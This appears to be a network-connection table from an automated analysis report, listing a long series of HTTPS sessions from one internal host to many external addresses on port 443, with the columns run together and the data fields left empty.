                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21077192.168.2.143638252.21.163.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21078192.168.2.143438452.175.227.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21079192.168.2.144165440.57.154.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21080192.168.2.1436816194.94.6.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21081192.168.2.1442990176.40.17.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21082192.168.2.1434402178.0.113.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21083192.168.2.1454530165.150.104.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21084192.168.2.1450006156.82.183.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21085192.168.2.1456284167.231.71.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21086192.168.2.1433780122.110.192.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21087192.168.2.144322863.126.40.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21088192.168.2.1438028140.38.188.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21089192.168.2.1454206119.46.53.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21090192.168.2.145405235.125.246.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21091192.168.2.1451654213.30.32.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21092192.168.2.14410042.203.104.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21093192.168.2.145220668.53.128.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21094192.168.2.145145446.81.196.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21095192.168.2.144795266.67.107.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21096192.168.2.144280835.222.90.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21097192.168.2.1439190220.232.168.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21098192.168.2.1443176170.40.5.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21099192.168.2.1450552111.126.52.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21100192.168.2.1445712129.254.37.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21101192.168.2.1452694222.101.126.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21102192.168.2.145887285.148.8.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21103192.168.2.1451114208.166.96.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21104192.168.2.1438536191.68.83.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21105192.168.2.1455252191.124.103.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21106192.168.2.1435970135.227.109.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21107192.168.2.1435676143.167.183.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21108192.168.2.1448244223.197.221.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21109192.168.2.143665077.94.67.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21110192.168.2.1451464129.18.52.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21111192.168.2.1458570205.207.50.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21112192.168.2.1446934104.220.125.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21113192.168.2.143526623.89.102.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21114192.168.2.14442921.224.125.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21115192.168.2.146002680.215.204.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21116192.168.2.144979442.66.216.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21117192.168.2.143739265.233.252.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21118192.168.2.1433426156.148.105.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21119192.168.2.1457420129.67.114.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21120192.168.2.1451086211.177.138.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21121192.168.2.144630223.67.28.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21122192.168.2.145019088.86.218.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21123192.168.2.1459190191.144.133.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21124192.168.2.144710645.74.178.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21125192.168.2.144635463.77.249.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21126192.168.2.1437162190.232.240.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21127192.168.2.1441384144.110.107.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21128192.168.2.1440902223.155.185.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21129192.168.2.1436712164.60.180.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21130192.168.2.1433326150.142.25.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21131192.168.2.144459417.214.173.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21132192.168.2.145988493.22.29.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21133192.168.2.1435486126.194.23.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21134192.168.2.145583268.218.113.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21135192.168.2.145258247.186.31.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21136192.168.2.1445924147.116.28.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21137192.168.2.1445190191.3.9.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21138192.168.2.1436336129.11.249.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21139192.168.2.1438138203.107.158.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21140192.168.2.1447452202.150.168.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21141192.168.2.1455098167.230.157.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21142192.168.2.145852857.86.191.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21143192.168.2.1442888196.153.254.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21144192.168.2.1454024204.133.139.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21145192.168.2.1434860179.203.169.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21146192.168.2.143717494.130.18.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21147192.168.2.1457170117.202.117.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21148192.168.2.145529269.33.77.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21149192.168.2.1437190179.132.213.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21150192.168.2.1457594184.199.210.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21151192.168.2.1434116180.228.118.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21152192.168.2.1436310117.39.109.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21153192.168.2.1441576120.56.98.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21154192.168.2.1439492191.103.39.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21155192.168.2.1449108162.194.205.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21156192.168.2.143496034.215.118.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21157192.168.2.1456948166.236.125.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21158192.168.2.1436364108.90.170.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21159192.168.2.1444376116.12.200.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21160192.168.2.1447100205.110.46.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21161192.168.2.1436540164.61.126.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21162192.168.2.1452458205.51.240.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21163192.168.2.1446686103.224.110.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21164192.168.2.1444944201.224.75.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21165192.168.2.1445006177.172.106.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21166192.168.2.143572067.65.96.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21167192.168.2.1460588126.171.90.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21168192.168.2.1449310105.238.144.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21169192.168.2.1455218145.219.50.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21170192.168.2.1436970201.245.180.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21171192.168.2.1446824190.3.167.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21172192.168.2.143339693.17.225.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21173192.168.2.1446310211.37.189.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21174192.168.2.1450558198.158.99.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21175192.168.2.145480495.176.14.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21176192.168.2.143403251.127.147.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21177192.168.2.1452322158.251.29.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21178192.168.2.1447310128.46.134.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21179192.168.2.1440550221.3.72.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21180192.168.2.145046896.31.214.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21181192.168.2.1452136208.40.180.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21182192.168.2.1437108147.181.45.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21183192.168.2.145873037.0.74.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21184192.168.2.1447360197.22.244.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21185192.168.2.1442760173.79.106.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21186192.168.2.1437050203.66.240.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21187192.168.2.145479445.37.253.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21188192.168.2.1437136163.149.102.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21189192.168.2.1437290198.124.204.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21190192.168.2.143838281.84.103.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21191192.168.2.145035251.15.169.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21192192.168.2.1456456184.74.100.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21193192.168.2.1441016120.208.130.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21194192.168.2.1458152196.64.217.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21195192.168.2.145526467.87.36.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21196192.168.2.144058670.55.141.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21197192.168.2.143436699.63.113.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21198192.168.2.145117448.250.252.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21199192.168.2.144893658.96.110.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21200192.168.2.1451140186.133.97.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21201192.168.2.1458550182.93.53.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21202192.168.2.1441730211.105.120.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21203192.168.2.144911679.233.46.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21204192.168.2.1454456192.179.33.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21205192.168.2.1443586105.36.102.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21206192.168.2.1443484177.248.3.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21207192.168.2.145647469.52.59.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21208192.168.2.1445236108.170.233.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21209192.168.2.1435736128.176.104.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21210192.168.2.145694273.30.222.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21211192.168.2.144838087.148.77.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21212192.168.2.1445292126.146.52.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21213192.168.2.1433732131.229.142.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21214192.168.2.1433936210.68.129.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21215192.168.2.1459206189.115.141.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21216192.168.2.1454308210.18.16.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21217192.168.2.143283834.96.3.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21218192.168.2.144654023.212.156.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21219192.168.2.1436582217.43.43.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21220192.168.2.145415444.120.116.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21221192.168.2.1433792152.173.130.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21222192.168.2.144391836.122.14.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21223192.168.2.1445042148.21.34.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21224192.168.2.145893264.53.24.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21225192.168.2.1457658188.247.140.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21226192.168.2.144153884.160.124.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21227192.168.2.145651478.90.61.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21228192.168.2.1453784164.98.94.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21229192.168.2.1438478106.132.10.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21230192.168.2.1437716101.135.95.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21231192.168.2.1438202101.240.223.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21232192.168.2.1456800113.137.202.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21233192.168.2.1459228178.179.128.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21234192.168.2.1448190147.104.216.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21235192.168.2.1438260151.47.95.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21236192.168.2.1437398104.178.157.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21237192.168.2.1456264220.122.180.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21238192.168.2.1439950147.222.3.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21239192.168.2.144481623.194.114.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21240192.168.2.1456194172.3.12.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21241192.168.2.1440676155.109.141.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21242192.168.2.143758244.19.21.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21243192.168.2.1434852164.190.227.34443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21244192.168.2.144487862.202.139.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21245192.168.2.144772850.53.68.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21246192.168.2.144969624.170.5.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21247192.168.2.1447770152.241.161.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21248192.168.2.143913248.53.43.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21249192.168.2.1455394195.190.3.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21250192.168.2.143545095.180.89.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21251192.168.2.14452324.167.117.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21252192.168.2.1438776183.35.97.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21253192.168.2.1448600180.204.106.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21254192.168.2.145493081.236.194.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21255192.168.2.1457950199.236.131.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21256192.168.2.1443832218.203.92.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21257192.168.2.1436290143.216.159.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21258192.168.2.145415298.217.3.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21259192.168.2.146012269.246.13.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21260192.168.2.143519017.125.220.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21261192.168.2.144541649.4.120.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21262192.168.2.1433094130.252.241.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21263192.168.2.1447144163.166.45.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21264192.168.2.145435246.219.223.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21265192.168.2.1447956164.219.205.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21266192.168.2.145109418.234.76.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21267192.168.2.1437132193.60.217.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21268192.168.2.144409474.122.96.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21269192.168.2.1456748159.16.220.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21270192.168.2.1450970171.169.119.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21271192.168.2.1455486100.233.56.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21272192.168.2.1455098119.135.37.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21273192.168.2.1436998176.181.234.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21274192.168.2.145739478.13.3.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21275192.168.2.145336248.117.240.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21276192.168.2.1443876113.34.109.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21277192.168.2.145930420.47.210.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21278192.168.2.144105043.55.137.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21279192.168.2.1447026166.77.141.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21280192.168.2.146022219.129.222.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21281192.168.2.1459078181.131.183.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21282192.168.2.144035273.210.139.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21283192.168.2.1438656129.13.113.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21284192.168.2.1448084101.138.87.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21285192.168.2.1455438145.191.168.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21286192.168.2.145514437.133.32.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21287192.168.2.1452894218.17.27.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21288192.168.2.146057266.96.202.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21289192.168.2.144357631.110.141.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21290192.168.2.1459372200.187.90.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21291192.168.2.145974231.138.120.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21292192.168.2.1453362152.153.180.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21293192.168.2.144357480.111.8.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21294192.168.2.1433686123.6.53.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21295192.168.2.1438750149.244.205.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21296192.168.2.145507444.102.25.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21297192.168.2.1456772100.255.17.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21298192.168.2.1450788122.81.209.188443
